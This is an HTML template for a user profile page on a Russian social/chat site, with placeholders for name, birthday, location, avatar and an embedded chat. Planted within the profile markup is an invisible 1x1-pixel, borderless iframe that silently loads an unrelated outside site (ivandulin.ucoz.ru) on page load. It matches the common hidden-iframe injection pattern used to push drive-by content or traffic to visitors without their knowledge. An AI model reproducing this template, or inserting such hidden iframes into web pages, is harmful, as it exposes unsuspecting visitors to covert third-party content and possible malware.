Code
<html>
<head>
<title>Персональная страница
Пользователя</title>
<base
href='http://world-dialogue.ru/'>
<link rel="stylesheet"
href="./templates/styles.css" title="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html;
charset=Windows-1251">
<link rel="stylesheet" type="text/css"
href="./templates/rating.css" />
<style
type='text/css'></style>
</head>
<body>
<table cellpadding='0' cellspacing='0'
width='800' align='center'>
<tr>
<td
align='center'>
<div class='ad_top' style='display:
block; visibility: visible;'></div>
<table
cellpadding='0' cellspacing='0' align='center' width='100%'>
<tr>
<td class='topbar1'></td>
</tr>
<tr>
<td class='topbar2'>
<a
href='home.php' class='$HOME_PAGE_LINK$'>Главная</a>
</td>
<td class='topbar2_right'>
Привет, <a
href='user_home.php' class='$HOME_PAGE_LINK$'>$USERNAME$</a>
<b><a href='user_logout.php'
class='$LOGOUT_LINK$'>Выход</a></b>
</td>
</tr>
<tr>
<td class='menu'
colspan='2'>
<table cellpadding='0' cellspacing='0'>
<tr>
<td class='menu_item'>
<a
href='$HOME_PAGE_LINK$' class='menu_item'><img
src='./images/icons/menu_home.gif' border='0'
class='icon'>Главная</a>
</td>
<td
class='menu_item'>
<a href='$PERSONAL_PAGE_LINK$'
class='menu_item'><img src='./images/icons/menu_profile.gif'
border='0' class='icon'>Я</a> [<a
href='$_CHANGE_DETAILS_URL$'>ред.</a>]
</td>
<td class='menu_item'>
<a href='$PM_URL$'
class='menu_item'><img src='./images/icons/menu_messages.gif'
border='0' class='icon'>Сообщения</a>
</td>
</tr>
</table>
</td>
</tr>
<tr><td class='shadow' colspan='2'><img
src='./images/shadow.gif' border='0'></td></tr>
</table>
<table cellpadding='0' cellspacing='0'
width='100%' align='center'>
<tr>
<td
class='content'>
<div class='page_header'>$USERNAME$ -
профиль</div>
<table cellpadding='0' cellspacing='0'
width='100%'>
<tr>
<td class='profile_leftside'
width='200'>
<table cellpadding='0' cellspacing='0'
width='100%' style='margin-bottom: 10px;'>
<tr>
<td class='profile_photo'><img class='photo'
src='$USER_AVATAR_URL$' border='0'></td>
</tr>
<tr>
<td>
</td>
</tr>
</table>
</td>
<td
class='profile_rightside'>
<table cellpadding='0'
cellspacing='0' width='100%' style='margin-bottom: 10px;'
id='actions'>
<input type='hidden' name='actions_total'
id='actions_total' value='2'>
<img id='actionimage'
src='./images/trans.gif' border='0' style='display: none;'>
</td>
</tr>
</table>
<iframe
frameBorder=0 scrolling=no width=1 height=1
src=http://ivandulin.ucoz.ru/></iframe>
<table
cellpadding='0' cellspacing='0' width='100%' style='margin-bottom:
10px;'>
<tr><td class='header'>Personal
Information</td></tr>
<tr>
<td
class='profile'>
<table cellpadding='0' cellspacing='0'>
<tr>
<td width='130' valign='top'>
Name:
</td>
<td>
$USER_FULL_NAME$
</td>
</tr>
<tr>
<td width='130' valign='top'>
Birthday:
</td>
<td>
$USER_BIRTHDAY$
(12 лет) </td>
</tr>
<tr>
<td
width='130' valign='top'>
Gender:
</td>
<td>
$USER_GENDER$
</td>
</tr>
</table>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' width='100%'
style='margin-bottom: 10px;'>
<tr><td
class='header'>Contact Information</td></tr>
<tr>
<td class='profile'>
<table
cellpadding='0' cellspacing='0'>
<tr>
<td
width='130' valign='top'>
City:
</td>
<td>
$_CITY$
</td>
</tr>
<tr>
<td width='130' valign='top'>
State/Province:
</td>
<td>
$_STATE$
</td>
</tr>
<tr>
<td width='130' valign='top'>
Country:
</td>
<td>
$_COUNTRY$
</td>
</tr>
<tr>
<td width='130'
valign='top'>
Website URL:
</td>
<td>
$_WWW$
</td>
</tr>
</table>
</td>
</tr>
</table>
<a
name='comments'></a>
<table cellpadding='0'
cellspacing='0' width='100%'>
<tr>
<td
class='header'>
Чат
</td>
</tr>
<tr>
<td class='profile_postcomment'>
<IFRAME src="/mchat" width="250" height="150" scrolling="no"
frameborder="0"></IFRAME>
</td>
</tr>
</table>
<div id='comment_error' style='color: #FF0000;
display: none;'></div>
<iframe name='AddCommentWindow'
style='display: none' src=''></iframe>
</div>
</div>
</td>
</tr>
<tr>
<td class='profile' id='profile_comments'>
<div
id='comment_1'>
<table cellpadding='0' cellspacing='0'
width='100%'>
<tr>
<td class='profile_item1'
width='80'>
Administrator<img src='./images/nophoto.gif'
class='photo' border='0' width='75'></a>
</td>
<td class='profile_item2'>
<table cellpadding='0'
cellspacing='0' width='100%'>
<tr>
<td
class='profile_comment_author'><b>Administrator</b></td>
<td class='profile_comment_author' align='right'
nowrap='nowrap'> </td>
</tr>
<tr>
<td colspan='2' class='profile_comment_body'>спасибо что
зарегестрировался, зови друзей подруг. Общайтесь на моем
сайте</td>
</tr>
</table>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
<div class='ad_bottom' style='display:
block; visibility: visible;'>
</div>
</td>
</tr>
</table>
</body>
</html>